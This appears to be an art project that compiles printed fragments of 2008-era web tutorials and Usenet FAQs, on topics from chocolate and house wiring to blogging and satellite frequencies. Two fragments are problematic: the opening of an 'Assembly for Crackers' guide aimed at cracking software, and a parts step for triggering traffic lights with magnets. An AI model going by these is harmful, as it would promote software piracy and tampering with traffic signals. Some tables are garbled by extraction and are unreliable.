The Instructional Capital volume I

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The Instructional Capital is a project in progress that investigates a range of systems and tools of information distribution that are related to instruction and empirical knowledge. These alternative educational practices, from the medieval manuals of any sort of paramedical or alchemistic instructions and advice for every-day tasks to the crowd of contemporary electronic manuals, tutorials, How-tos, FAQs etc, define a theoretical and ideological field with economical, social and spiritual extensions that re-define the evaluation and use of information, the creative process and the nature of knowledge.

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The Instructional Capital

Volume I

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Trigger GREEN Traffic Lights: What you need! - Instructables - DIY,... http://www.instructables.com/id/S2TCJZQF6S98E62/

1 3 10/4/2008 8:30

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Trigger GREEN Traffic Lightsby Kipkay on Sep 19, 2007 in RIDE & TECH email it!

step 3 What you need!2 Neodymium magnets. I chose two from CMS Magnetics that have a pulling force of over 6lbs each. I also bought a roll of heavy duty exterior mounting tape.

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Automatic Bicycle Handlebar…Welcome, This Instructable will teachyou step-by-step how to integrateautomatic…by Handsome-Ryan

Temporary Bicycle TrailerIn this instructable, I'll show you howto make a temporary bicycle trailerout of…by bennokr

Replace Your PedalsThis tutorial explains the proper wayto remove and install bike pedals.How To R…by BicycleTutor

How to Clean Motorcycle Car…This free motorcycle was sitting inDavid Durlach's garage for 20 years.David ev…by stasterisk

Get Out And Get Biking (or …Everyone knows that one of the mostharmful and un-green of the thingsthat we do …by Gjdj3

How to Convert a 24V scoot…It's a quest for E-speed... And I don'tmean a dot com bubble "E." These…by trebuchet03

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views: 125.392

category: ride & tech

keywords: traffic, motorcycle, scooter, bicycle, kipkay

license: None (All Rights Reserved)

author: Kipkay

published: Sep 19, 2007

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Electrical Wiring FAQ (Part 1 of 2) http://www.faqs.org/faqs/electrical-wiring/part1/

1 19 11/4/2008 2:09

Part1 - Part2 - MultiPage

Electrical Wiring FAQ (Part 1 of 2)There are reader questions on this

topic!Help others by sharing your


From: [email protected] (Chris Lewis)Newsgroups: alt.home.repair, misc.consumers.house, rec.woodworking,sci.electronics.miscSubject: Electrical Wiring FAQ (Part 1 of 2)Date: 12 Mar 2004 20:27:59 GMTMessage-ID: <[email protected]>Reply-To: [email protected] (Chris Lewis)Summary: A series of questions and answers about house wiringKeywords: Electrical Wiring FAQX-Posting-Frequency: Posted every 14 daysX-Content-Currency: This FAQ hasn't been updated in a number of years, and is somewhat out of date with the last revision or two of the NEC and CEC. We anticipate this will be changing soon.

Posted-By: auto-faq 3.3.1 (Perl 5.006)Archive-name: electrical-wiring/part1

Updated: WARNING

This FAQ has not been updated or posted in a number of years. Itis intended that it will be updated to bring it more into compliancewith current code. Comments welcome at wirefaq(@)ferret.ocunix.on.ca

Frequently Asked Questions on Electrical Wiring

Copyright 1991-2004 Steven Bellovin (smb(at)research.att.com) Chris Lewis (clewis(at)ferret.ocunix.on.ca)

Redistribution for profit, or in altered content/format prohibited without permission of the authors. Redistribution via printed book or CDROM expressly prohibited without consent of the author. Any other redistribution must include this copyright notice and attribution.

Comments to: [email protected]

The latest FAQ can always be obtained from:


This FAQ is formatted as a digest. Most news readers can skip from onequestion to the next by pressing ^G.

Answers to many other topics related to houses can be obtained from themisc.consumers.house archive; send an empty piece of mail [email protected] for information.

Changes to previous issue marked with "|" in left column. Watchparticularly for "NEW" in the Questions list for new or substantivelychanged answers. "g^|" will get you to the changed sections quickly inmost newsreaders.

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Chocolate Frequently Asked Questions (FAQ) http://www.faqs.org/faqs/food/chocolate/faq/

1 8 11/4/2008 2:09

[ Usenet FAQs | Search | Web FAQs | Documents | RFC Index ]

Chocolate Frequently Asked Questions (FAQ)There are reader questions on this topic!Help others by sharing your knowledge

Message-ID: <food/chocolate/[email protected]>X-Last-Updated: 1998/01/24Subject: Chocolate Frequently Asked Questions (FAQ)Newsgroups: rec.food.chocolate, rec.food.cooking, alt.food.chocolateFrom: The Chocolate Archives <[email protected]>Reply-To: [email protected]: This posting contains a list of Frequently Asked Questions (and their answers) about chocolate. It deals with eating, cooking with and buying chocolate. Date: 17 Apr 2004 11:27:57 GMT

Archive-name: food/chocolate/faqPosting-Frequency: monthlyLast-modified: 23 Jan 1998Version: 3.3


This FAQ is posted on the sixth day of every month. The most recent copy of this document can be obtained via anonymous FTP as rtfm.mit.edu:/pub/usenet/news.answers/food/chocolate/faq. If you do not have access to anonymous FTP, you can retrieve it by sending email to [email protected] with the command "send usenet/news.answers/food/chocolate/faq" in the message.

=== CONTENTS === (+ = sections changed since last edition)

0. The Not-So-Fine-Print

1. General 1.1 What is chocolate? 1.2 What is the history of chocolate? 1.3 How is chocolate made? 1.4 What is conching? 1.5 What kinds of chocolate are there? 1.6 What is this white, blotchy stuff on my chocolate bar? 1.7 I just bought a whole bunch of chocolate. What's the best way to store it? 1.8 What is lecithin and why is it in my chocolate?

2. Cooking with chocolate 2.1 What is tempering? 2.2 What is couverture? 2.3 How do I melt chocolate and what's the best kind to use? 2.4 I was melting some chocolate, and suddenly it changed from a shiny, smooth liquid to a dull, thick paste. What happened? 2.5 How do I make chocolate covered strawberries? 2.6 Where can I get some chocolate?

3. Chocolate trivia 3.1 Hey! Did you hear about this lady at Neiman Marcus who wanted to buy a cookie recipe...? 3.2 Is chocolate really an aphrodisiac? 3.3 Can I give chocolate to my dog? 3.4 How much caffeine is in chocolate? 3.5 Doesn't chocolate cause acne?


0. The Not-So-Fine Print This document is intended to provide answers for some common questions posted to rec.food.chocolate. It is by no means comprehensive. Discussion on any topic discussed in this FAQ is certainly encouraged. Additions or corrections are always welcome. This document was compiled by Monee Kidd <[email protected]>, to whom questions, comments, queries, concerns, additions, corrections and/or deletions should be directed. Flames should be directed to dev/null. Most answers were gathered from posts to rec.food.chocolate. Many thanks to the many people who help make this FAQ a reality. In addition, some background information was shamelessly lifted from The World Book Encyclopedia [(c) 1983. so what, it's an old version, I know]. This FAQ is Copyright (C) 1997 by Monee C. Kidd. This text, in whole or in part, may not be published in print, or sold in any medium, including, but not limited to, electronic or CD-ROM without the explicit, written consent of Monee Kidd.


1. General

A reader of the old alt.food.chocolate once asked:

"I would be very much obliged if someone could tell me how a food that has been associated with acne, headaches, obesity and many a trip to the dentist has managed to attract so much favorable attention."

In the eighteenth century a Swedish naturalist named Carolus Linneaus who created the modern system of naming all the living things on the earth called the tree from which chocolate comes 'Cacao theobroma' - Cacao,

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Linux Frequently Asked Questions with AnswersPrev Next

8. Miscellaneous Information and Questions AnsweredQ: How To Program XYZ Under LinuxQ: What's All This about ELF? glibc?Q: How To Determine What Packages Are Installed on a SystemQ: What Is a .gz File? And a .tgz? And .bz2? And... ?Q: What Does VFS Stand For?Q: What is a BogoMip?Q: What Online/Free Periodicals Exist for Linux?Q: How Many People Use Linux?Q: What Is the Best (DistributionQ: How Does One Pronounce Linux?

Q: How To Program XYZ Under Linux

A: Read the manuals, or a good book on Unix and the manual pages (type man man). There is a lot of GNU Info documentation, which is often more useful as a tutorial. Run Emacs and type F1-i, or type info info if you don't have or don't like Emacs. Note that the Emacs libc node may not exactly describe the latest Linux libc, or GNUglibc2. But the GNU project and LDP are always looking for volunteers to upgrade their library documentation.

Anyway, between the existing Texinfo documentation, and the manual pages in sections 2 and 3, should provideenough information to get started.

As with all free software, the best tutorial is the source code itself.

The latest release of the Linux manual pages, a collection of useful GNU Info documentation, and various other information related to programming Linux, can be found on metalab.unc.edu/pub/Linux/docs/man-pages/.

Q: What's All This about ELF? glibc?

A: See the ELF HOWTOby Daniel Barlow. Note that this is not the file [move-to-elf], which is a blow-by-blow account of how to upgrade toELF manually.

Linux has two different formats for executables, object files, and object code libraries, known as, ``ELF.'' (The old format is called ``a.out.'') They have advantages, including better support for shared libraries and dynamic linking.

Both a.out and ELF binaries can coexist on a system. However, they use different shared C libraries, both of whichhave to be installed.

If you want to find out whether your system can run ELF binaries, look in [/lib] for a file named, ``[libc.so.5].'' If it's there, you probably have ELF libraries. If you want to know whether your installation actually is ELF you can picka representative program, like ls, and run file on it:

-chiark:~> file /bin/ls

/bin/ls: Linux/i386 impure executable (OMAGIC) - stripped

valour:~> file /bin/ls

/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1, stripped

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About Dyes Instructions FAQ More My Gallery Links Buy Dyes

Know your materials - make better art

You are here: Home > All About Hand Dyeing > About Dyes > Fiber Reactive Dyes> Vinyl Sulfone Dyes > Old Createx instructions

Old Instructions for Createx Color Vinyl Sulfone DyesCreatex Liquid Fiber Reactive Dyes have been discontinued; however, since Vinylsulfone Dyes are still sold by other companies, these old instructions may be of interest still.


Createx Permanent Liquid Fiber Dyes are brilliant light fast dyes that when used with afixative (soda ash or baking soda), colors become permanent on natural fibers such as silk, cotton, linen, viscose rayon, and wool. paper, and leather.

Createx Liquid Fiber Dyes do not contain airborne procion dust powders, or harmful alcohol vapors. They contain no known harmful ingredients. [Note that this statement isprobably not strictly true! --P.] Colors are completely transparent and will not affect the feel of the material.


Tie Dyeing

1) For best results, wash item first to remove sizing. 2) Presoak fabric with water. 3) Make fixative solution by adding 5 heaping tablespoons of of Soda Ash and 1/4 cup salt per gallon of water. ( 2 gallons of fixative solution will do roughly three T-shirts) 4) Add presoaked fabric to mixture and allow to soak for at least 30 minutes. 5) Remove item from fixative solution, wring gently, leave damp. 6) Fold, twist, and tie fabric using strings, rubber bands, etc. 7) Dilute Liquid Fiber Dyes with 7 parts water. Drop dye onto fabric by squeeze bottle, eye dropper, cotton swab, etc. 8) Dyes become permanent by placing item into a plastic bag for 24 hours than removeand rinse under cool water until water runs clear. Remove bindings from item. Soak item in warm water with detergent for 10 minutes before rinsing thoroughly. Lay item flat to dry. Once dry, place in dryer for additional setting.

Immersion Dyeing

1) For best results, wash item first to remove sizing. Do not use bleach, whiteners, or softeners.2) Make up a dye bath by adding enough water to allow fabrics to flow freely. Estimate weight of fabric to determine proper amount of dye and fixative necessary. Use following guide:

Dye amounts for (1) one pound of fabric: Light shades 1/4 to 1/2 oz. dye

How to Discover Your Next Favorite Band - Mahalo http://www.mahalo.com/How_to_Discover_Your_Next_Favorite_Band

1 6 19/4/2008 2:27

How to Discover Your Next Favorite BandAlso try: How to Download Free Music | iTunes | Seeqpod | iPod | MP3 Player | The Filter

Guide Note:

Has your music library grown stale? This page offers tips on discovering new music. It will show you how to discover your next favorite band!

Step 1: Use web music recommendation services

Web sites like Pandora, Last.fm, iLike and SeeqPod will recommend music based on music you like. Eachservice has somewhat different recommendations, so by using all four, you can get a wide range of suggestions.

How to discover new music with Pandora

Go to Pandora.1.Register for free using the button in the upper right hand corner.2.Once you have registered, click "Create a New Station".

Figure 1: Pandora's "Create a New Station" button


Type in the name of an artist or song that you particularly like.4.Click "Create".5.Wait for about a minute as Pandora creates a station based on the information you've provided.6.If you have entered an artist's name, the station will play a song that it thinks is a good example of that artist's work. If you agree, hover your mouse over the album cover, and click on the thumbs-up icon.


More music will play that is similar to what you have selected. If you like it, hover your mouse over thealbum cover, and click on the thumbs-up icon. If you don't, hover your mouse over the album cover, andclick on the thumbs-down icon.


If you enjoy a song, hover your mouse over the album cover and click on the triangle icon. You canbookmark the artist for later investigation, or buy music from that artist from iTunes or Amazon.


How to discover new music with Last.fm

Go to Last.fm.1.In the middle left hand side, where it says "Type in an artist you like", type in the name of an artist you enjoy.2.

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Hourences' Community Site - Books - Tutorials - Jobs - Textures http://book.hourences.com/tutorialsue3mated3.htm

1 5 14/4/2008 4:49



About : This third material tutorial focusses on teaching you a thing or two about the UE3 Material Editor by explaining a number of random examples. Learnby practical use rather than theoretical explanations.

Target Audience : Unreal Engine users - Intermediates

Platform : Unreal Engine 3

Last Update : January 2008 - Added Vertex Colors

Related links : Material Tutorial 1Material Tutorial 2Water Tutorial 1 - OutdoorWater Tutorial 2 - IndoorMaterial Expressions

IntroductionInstead of giving you complex, technical and theoretical explanations of every single property I'm convinced that you learn qui cker by practice, therefore thistutorial simply provides you with examples of common materials and how they were made.

This third tutorial focusses on some of the more complex materials one can make, including embedding the Parallax Map into the Normal Map, Celshading,Instanced Materials, and materials that responds to distance.

The Examples

Material Instances

Material Instances are nifty things that can be used to make a quick and easy variation of an existing material setup without h aving to duplicate the entiresetup. A Material Instance becomes a child of the original parent material. The biggest advantage of this approach is that when you have the need to modifyor polish the original material, all children will also change along without any additional work.

Setting it up is pretty simple. Create a regular material and set it up like my example.



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How to be cool on Facebook http://www.koonji.com/showKoonji.htm?koonjiId=956

1 1 13/4/2008 10:23


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Facebook Etiquette : How to Seem Cool 101Facebook is a great way to stay in touch with old friends and scope out new classmates. Yet, aswith any social interaction, there are some rules of etiquette to keep in mind if you want your Facebook experience to go smoothly. These guidelines will help you avoid sending the wrong message to those who look you up.

BuzzMachine - Facebook etiquette questionQuestion for longtime Facebook users: What'ss the proper etiquette when someone you do not know asks to befriend you?

How to be cool on FacebookCreated by: pling | Key contributors: BleysEvery year, there's a new hottie on the social networking circuit. First there was Friendster, then MySpace and now there's Facebook. Every site like this sets its own rules, which develop and morp as more users sign up and set their preferences. It's democracy rule of the majority, and eventually, everyone adopts and abides by the unstated rules. Let's take a brief look at what to do and what not to do, if you're on facebook, and looking to make yourself popular.

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Respond to MessagesAs in life, you need to build relationships and trust. You need to reach out to friends, or prospective friends. If anyonesends you a message, and you want to respond, do it immediately. Establish a dialogue and a committment to respondingto your friends. That makes them respond to you. Be nice, and give compliments. Give friendly advice. Be there for yourfriends.

You also need to make new friends. Send out a 100 new requests, asking people to allow you to be their friends, and giveyou access to their page. Maybe 10 will accept. Build on that. Do it everyday. Building relationships takes time and effort,and a certain amount of social grace, wherein you know what to say and what not to say.


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A Non-Professional’s Guide To Making Real Estate Video « For Sale ... http://forsalebylocals.wordpress.com/2006/08/11/shooting-real-estate-...

1 7 8/4/2008 9:18

For Sale By Locals: The Blog of RealEstateVideo.netReal Estate Video | Software | International Marketing | Conceptual Thinking | Consulting

« Video and Real Estate Listings Part 3Progress Report - Closing In On Website Launch »

A Non-Professional’s Guide To Making Real Estate VideoAugust 11, 2006

This post will address hands-on solutions for vlogs/video podcasts applicable to online video in general.More specifically, it will delve into that specific concerns associated with real estate video production andediting issues. It isn’t intended to be a professional guide - only a set of thumbnail rules that may help youto quickly shoot better real estate video for immediate use online while you learn to implement moreprofessional techniques.

In other posts, we discussed that video is not a magic solution to selling your property. It is a tool to bemanaged. As correctly pointed out in a comment by Toby in Part 1 of the “Video and Real Estate” series ofposts, video that is poorly done can keep people away from an otherwise interesting listing. Additionally, thevideo might blow the sale by establishing a different set of expectations from what exists. Great points andthanks for the participation. I want to expand on Toby’s points and discuss more of the issues and potentialsolutions.

Issues to be covered in this first posting include the following:

Small Screen Size: Many people likely dont watch full screen video on their computer (although a fairnumber likely do). The smaller the screen, the less “feel” one gets for the property.

Unrealistic Perspectives: Viewing perspective makes or break a real estate video. This is part of what Tobyrefers to in his comment and this issue could fill an entire blog. In it’s most simplistic form, lens focal lengthdetermines the angle of view and the perspective that viewers see. Wikipedia has a great article on focal length and lenses as they apply to cameras - the information is equally applicable to video cameras. Note thatchanging the amount of zoom on most video cameras can also change perspective.

Airing Dirty Laundry: Videos of unkempt properties likely are not as interesting (in the ways that matter anyway) as properties that are properly prepared for sale.

White Walls (and more White Walls): Video of real estate can morph into a video of walls and corners.This is particularly true of an unfurnished properties. The corollary to this for land video might be called“grass and more grass…the grass is always greener…”

Excessive Motion: Ever watch a vacation video that made it hard to focus on the subject due to shaky videowith fast pans and zooms? Would people find that interesting to watch for a home sales video? Enoughsaid. hehe.

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1 2 20/4/2008 10:16

How to Do a Close Reading

The process of writing an essay usually begins with the close reading of a text. Of course, the writer's personalexperience may occasionally come into the essay, and all essays depend on the writer's own observations andknowledge. But most essays, especially academic essays, begin with a close reading of some kind of text—apainting, a movie, an event—and usually with that of a written text. When you close read, you observe facts anddetails about the text. You may focus on a particular passage, or on the text as a whole. Your aim may be tonotice all striking features of the text, including rhetorical features, structural elements, cultural references; or,your aim may be to notice only selectedfeatures of the text—for instance, oppositions and correspondences, or particular historical references. Eitherway, making these observations constitutes the first step in the process of close reading.

The second step is interpreting your observations. What we're basically talking about here is inductive reasoning:moving from the observation of particular facts and details to a conclusion, or interpretation, based on thoseobservations. And, as with inductive reasoning, close reading requires careful gathering of data (yourobservations) and careful thinking about what these data add up to.

How to Begin:

1. Read with a pencil in hand, and annotate the text.

"Annotating" means underlining or highlighting key words and phrases—anything that strikes you as surprisingor significant, or that raises questions—as well as making notes in the margins. When we respond to a text in thisway, we not only force ourselves to pay close attention, but we also begin to think with the author about theevidence—the first step in moving from reader to writer.

Here's a sample passage by anthropologist and naturalist Loren Eiseley. It's from his essay called "The HiddenTeacher."

. . . I once received an unexpected lesson from a spider. It happened far away on a rainymorning in the West. I had come up a long gulch looking for fossils, and there, just at eyelevel, lurked a huge yellow-and-black orb spider, whose web was moored to the tallspears of buffalo grass at the edge of the arroyo. It was her universe, and her senses didnot extend beyond the lines and spokes of the great wheel she inhabited. Her extendedclaws could feel every vibration throughout that delicate structure. She knew the tug of wind, the fall of a raindrop, the flutter of a trapped moth's wing. Down one spoke of theweb ran a stout ribbon of gossamer on which she could hurry out to investigate her prey.

Curious, I took a pencil from my pocket and touched a strand of the web. Immediatelythere was a response. The web, plucked by its menacing occupant, began to vibrate untilit was a blur. Anything that had brushed claw or wing against that amazing snare wouldbe thoroughly entrapped. As the vibrations slowed, I could see the owner fingering herguidelines for signs of struggle. A pencil point was an intrusion into this universe forwhich no precedent existed. Spider was circumscribed by spider ideas; its universe wasspider universe. All outside was irrational, extraneous, at best raw material for spider. AsI proceeded on my way along the gully, like a vast impossible shadow, I realized that inthe world of spider I did not exist.

2. Look for patterns in the things you've noticed about the text—repetitions, contradictions, similarities.

What do we notice in the previous passage? First, Eiseley tells us that the orb spider taught him a lesson, thusinviting us to consider what that lesson might be. But we'll let that larger question go for now and focus onparticulars—we're working inductively. In Eiseley's next sentence, we find that this encounter "happened faraway on a rainy morning in the West." This opening locates us in another time, another place, and has echoes ofthe traditional fairy tale opening: "Once upon a time . . .". What does this mean? Why would Eiseley want toremind us of tales and myth? We don't know yet, but it's curious. We make a note of it.

Details of language convince us of our location "in the West"—gulch, arroyo, and buffalo grass. Beyond that,though, Eiseley calls the spider's web "her universe" and "the great wheel she inhabited," as in the great wheel of

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Help for DIY Enthusiasts

I am occasionally asked by DIY enthusiasts to assist with the design of their own Ambisonic decoders. Here aretwo e-mail messages which encapsulate my knowledge (and also my ignorance) in this area. Be aware that theW, X and Y channel gains are those inside an Ambisonic decoder and the sqrt(2) boost, applied to X and Y toequalise the energy in the channels, has been removed.

Shelf Filters

Subject: Re: LEVEL!!! mode selectDate: Sun Oct 4 21:33:35 1998From: Martin J Leese

There is good news and bad news.

The bad news is that the paper distributed does not seem to contain an explanation of how to derive the appropriate shelf filter gains for different speaker layouts, etc. The good news is it does contain enough information to reconcile the apparently different shelf filter gains in the various papers for horizontal four-speaker UHJ and B-Format.

For 2-channel UHJ decoding the high-frequency gains are 1.0. Somepapers suggest that the low-frequency gains for UHJ should be 1.0, but this turns out to be only because the suggested circuit for switchable gains holds the low-frequency gain at 1.0 and so pushes the required low-frequency gains into a prior resistor matrix. Other minor differences are explained by the shelf filter gains for UHJ differing slightly from its predecessor System 45J.

Here are the shelf filter gains. I stress that these are for a horizontal four-speaker layout only.

Low High

B-Format: W 1.00 1.2247 X,Y 1.00 0.8660

UHJ: W 0.646 1.00 X,Y 1.263 1.00 B 0.775 1.00

In truth, there is still some disagreement between the papers aboutthe gains for the B-channel of UHJ (used for Forward Preference). I have shown above the gains from the Gerzon 1985 reference and suggestyou use its matching formulae.

The Gerzon 1977d reference states that the gains for Super Stereo are very similar to B-Format. What is still a mystery, at least to me, is

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Page 14: The Instructional Capital volume I

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An Amateur's Guide to Spirituality


Ella Roberts

Globusz PublishingNew York • Berlin


Start Your Own Travel Agency Worldwide, over a trillion dollars are spent on travel each year; over six billion in North America alone. Travel was the second largest employer in the U.S. and Canada, supporting over 6 million jobs. Travel represented 7% of the U.S. and Canadian Gross National Product. 65% of U.S. and Canadian residents took at least one trip over 100 miles. Nearly 42,000 travel agencies averaged $22,500 each week in airline ticket sales. Agencies book an additional 40% in tours, cruises, hotels, etc., therefore making the average travel agency volume $1,500,000, according to the U.S. Department of Commerce. Net profits average 4% to 5%, making the potential net profit in a travel agency $60,000 to $70,000. The travel industry has been growing even during the recent recession and is now experiencing unprecedented growth worldwide. You can start your own travel agency, which can be operated from your home, for under $10,000, including required training, operations manuals, reservations software and access to the airlines reservations computers, and initial supplies (stationery, posters, brochures). These services are provided as part of a package by TPI Travel Services, who also provide a TPI photo ID card for immediate free and reduced rate travel benefits.

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How to Set Up a Blog for Beginners - Mahalo http://www.mahalo.com/How_to_Set_Up_a_Blog_for_Beginners

1 22 19/4/2008 2:28

How to Set Up a Blog for BeginnersAlso try: Web Design Also try: Web Hosting

Guide Note:This page contains information and tips on how to set up a blog for beginners. All you need to get started is an email address and something to say.

Table of Contents:

Introduction: What is a Blog?Step 1: Define Your NicheStep 2: Name Your BlogStep 3: Choose a Blog HostStep 4: Create Your BlogWith BloggerWith WordPress.comWith VoxWith TypepadStep 5: Write Great Blog PostsStep 6: Build an AudienceStep 7: Measure Your TrafficStep 8: Monetize Your BlogLegal Resources for BloggersResources for How to Set Up a Blog

Introduction: What is a Blog?

You can have a blog up and running in under 5 minutes (Photo by Renxx Garmider)

A blog(weblog) is a special type of website that displays entries or posts in reverse chronological order. The most recently written post appears at the top. The posts themselves consist of text, images, links to other websitesand, typically, a means for readers to leave comments about the post.

Blogs can function as online diaries, soap boxes, journalistic ventures or internet scrapbooks. They can cover any number of subjects from pop culture to politics to what you had for lunch yesterday.

All you need to start blogging is an email address and something to say. There's more than one free blogging service that can have you up and running in under five minutes. No technical expertise needed.

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Make a cool hologram illusion!: Display Setup - Instructables - DIY,... http://www.instructables.com/id/SJ6HZOGF7DWO547/

1 3 4/4/2008 10:53

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Make a cool hologram illusion!by NK5 on Oct 11, 2007 in HOME & TECH email it!

step 3 Display SetupTo keep from giving away the source of the image, adjust the brightness to the lowest setting and the contrast to the highest.

The goal is to make the background as dark as possible. Play the movie you want to use full screen, then adjustas needed.

For the cabinet configuration, suspend the LCD monitor above the viewing area. Then create a Halloweenish looking scene inside, and then place the glass over it at an angle that will reflect the image to the viewer.

For the windows configuration, set the monitor on the floor pointing up, create your scary scene, then place a much larger piece of glass over it at an angle that will reflect the image towards the window.

In either setup, the bottom edge of the glass should be as close to the bottom edge of the monitor as possible. That will make the image float in front of your scene, instead of behind it.

Adjust the angle of the glass to control the height of the floating head.

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published: Oct 11, 2007

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An Amateur’s Guide to Plant NomenclatureMike Hillman

Master Gardener Spouse

Long before I ever met her, gardening has been a passion for my wife. I'm notsure if it’s her English ancestry or a result of some early childhood event, butAudrey just can't seem to get enough time in the garden. While her life as anapartment dweller did put some natural limits on what she could and couldn'tgrow, even still, the oxygen level in her apartment was always higher than theair outside, even with the windows open!

With the purchase of our farm however, all bets were off. From the moment she first stepped foot on it, Audrey began to draw her plans. Slowly but surely, she has managed to turn this old plain tenant farm into a botanical wonderland, fullof plants and flowers of every shape, size, color, and purpose . . . the names of which, in spite of Herculean half-hearted efforts, still elude me.

At first, Audrey tried to teach me the proper Latin names for her 52,000 varieties of plants. But my inability to comprehend her thoroughly lucent dissertation of the basic structure of plant categorization, namely: Kingdoms, Divisions, Classes, Orders, Families, Genus, Species, Subspecies, etc., etc., left me so frustrated that I found myself yearning for a bottle of gin and two hours alone in her garden with a weed whacker.

Unwilling to admit to my own ineptitude, I began to sneak into the garden andstudy the nameplates under each of the plants. At first, all went well. Everychance I got, I would strut around like a peacock spouting off my new foundknowledge. Occasionally a visitor would try to probe below my impressivelyshallow level of knowledge, but drawing upon my nuclear power background, Iwould quickly fall back on the old trick of ‘If you can’t dazzle with brilliance,baffle with techno babble . . .’

" . . and this is another subspecies of Lemon Verbena . . . "

"Um . . . it looks like a mum to me . . ."

"To the uneducated eye it appears to be a mum, but in reality, it a member of a genetically manipulated class of the Verbena subspecies that was formally part of a small cross-dressing Varity of Lemon Verbena. I picked it up in SanFrancisco."

"Hum . . . are you sure its not a mum?"

"Definitely. You don’t live with a Certified Master Gardener Extraordinaire andnot pick up a few things. Interestingly enough, this Verbena subspecies is ancommon additive to good gin. Speaking of gin, care for one?"

Aware that my charade was beginning to wear thin, I set my sites on doubling my knowledge base. Unfortunately, by the time I got around to picking a second plant to memorize, Audrey had absconded with the nametags, forcing me to create my own naming convention, which over the years, I've had ample time tohone and refine.

According to my theory, all plants are divided into two main groups, Pull’um

Assembly for Crackers - v1.0----------------------------

Hey, This is a very basic guide to assembly for all those people who couldn’t be both-ered learning the in’s & out’s of their computer just to be able to use mIRC without having to click on some guys face. :)

I’ll basically go through the most necessary stuff that you need to know before you can begin to crack. I know it’s not in a very logical order, but what d’ya want for free? ;))

Oh yeah, you should view this with wordwrap on, otherwise it’ll be a pain in the arse to follow ;)

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SOC.CULTURE.PUERTO-RICO: Introduction and FAQ http://www.faqs.org/faqs/puerto-rico-FAQ/

1 15 4/4/2008 11:38

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SOC.CULTURE.PUERTO-RICO: Introduction and FAQThere are reader questions on this topic!Help others by sharing your knowledge

From: [email protected] (Zeydy Ortiz Laureano)Newsgroups: soc.culture.puerto-rico, soc.culture.latin-americaSubject: SOC.CULTURE.PUERTO-RICO: Introduction and FAQDate: 9 May 1997 17:45:48 GMTSender: [email protected] (Zeydy Ortiz Laureano)Message-ID: <[email protected]>Reply-To: [email protected] (Zeydy Ortiz Laureano)Summary: This document contains information about SOC.CULTURE.PUERTO-RICO (charter, netiquette, and related questions), PUERTO RICO (festivities, national symbols, and Internet resources) and about VISITING PUERTO RICO (where to go, where to stay, and where to get more information).

Archive-name: puerto-rico-FAQPosting-Frequency: monthly

~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ S O C . C U L T U R E . P U E R T O - R I C O

Introduction and Frequently Asked Questions

June 6, 1996~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~

Welcome to soc.culture.puerto-rico! This article contains information about this group, about Puerto Rico and about visiting Puerto Rico. I hope that the information provided is useful to you and that you decide to participate in the group and contribute with your ideas.

! In this issue I have corrected the information about "Where to stay in! Puerto Rico?" that was missing from previous postings. Also, the! section on "Where can I get information about Puerto Rico in the Web?"! is constantly updated.

New area code for Puerto Rico: Effective March 1, 1996, the area code for Puerto Rico is 787. The old area code (809) can still be used until the end of the year.

This posting is in Usenet digest format. If your news reader supports the digest format, press Ctrl-G (^G) to go to the next question. Otherwise, search for the next line with "Subject:" at the beginning. Changes to this file are now marked with an exclamation mark (!) at the beginning of the line.

You can read a hypertext version of this document in the World Wide Web at< http://www.cis.ohio-state.edu/hypertext/faq/usenet/puerto-rico-FAQ/ faq.html > or retrieve the most recently posted version from < ftp://rtfm.mit.edu/pub/usenet/news.answers/ >.

The information is correct to the best of my knowledge. If you find an error, let me know the correction. Contributions from other people are also included and I have tried to give proper credit to the authors. If you have any comments and wish them to be included, send me a message. Also, if you want to change any of the comments you have provided, let me know and I will make the changes accordingly.

You can copy and redistribute this file in whole or in parts only for personal and/or non-commercial purposes as long as you give proper credit to the sources including information on contributors at the end of each section and the following information: Document: SOC.CULTURE.PUERTO-RICO: Introduction and FAQ Distribution Date: June 6, 1996 Maintainer: Zeydy Ortiz Laureano <[email protected]> Archive: < ftp://rtfm.mit.edu/pub/usenet/news.answers/ >

If you have any ideas, suggestions or comments on how to improve this file (or just want to say hello), please, send me a message. Also, if you find any information on the Internet that may be included here, let me know.

Zeydy Ortiz Laureano <[email protected]>

~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~


~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~

SOC.CULTURE.PUERTO-RICO -> Charter - Topics of discussion - Posting Policy - Language - BORIKEN -> What is BORIKEN? -> Reminders -> Summary of things to remember -> I do not understand Spanish. Why don't you write in English?!? -> I am trying to practice Spanish. Will I get flamed if I write to this newsgroup in my poor Spanish? -> Can't you write proper Spanish?!?! -> Why don't you use diacritical marks (accent marks, tildes, dieresis) in soc.culture.puerto-rico? -> How do I create a kill file?

PUERTO RICO -> Patron Saint Festivals -> Christmas Celebrations -> National Symbols -> Where can I get information about Puerto Rico in the Web? -> Where can I get image files of Puerto Rico? -> Who is providing Internet services in Puerto Rico?

TRAVEL INFORMATION -> Do I need a passport? -> What places should we visit in Puerto Rico?

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Amateur Satellite Frequency Guide

Compiled December 1996


AO-10(note 2) B (U/V) Down


RS-10(notes 3) A (V/A) Down

Up Robot

Bcn29.357 & 29.403

Down 145.860 870 880 890 145.900

RS-12(notes 3) K (H/A) Down

Up Robot

Bcn29.408 & 29.454

T DownUp



Down 29.460 470 480 490 29.500

RS-15 DownUp

Bcns29.352 & 29.399

FO-20(JAS-1b)(note 7)

JA DownUp


JD(a) DownUp

435.910145.850 145.890 145.910

FO-29(JAS-2)(note 7)

JA DownUp


JD(a) DownUp

435.910145.850 145.870 145.890 145.910

JD(c) DownUp


JD(d) Down 435.910


J(b,a) DownUp


MIR (b)FM voice



SAFEX FM Voice Down 437.950

Rpt. Up 435.750

Dgr.Voice DownUp


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Free 3D Tutorials & CG Tutorials http://www.free3dtutorials.com/efects/photoshop/painting-clouds.php

1 3 9/4/2008 12:10

PAINTING CLOUDS by Steven Stahlberg

I used Photoshop, but any paint program should work.

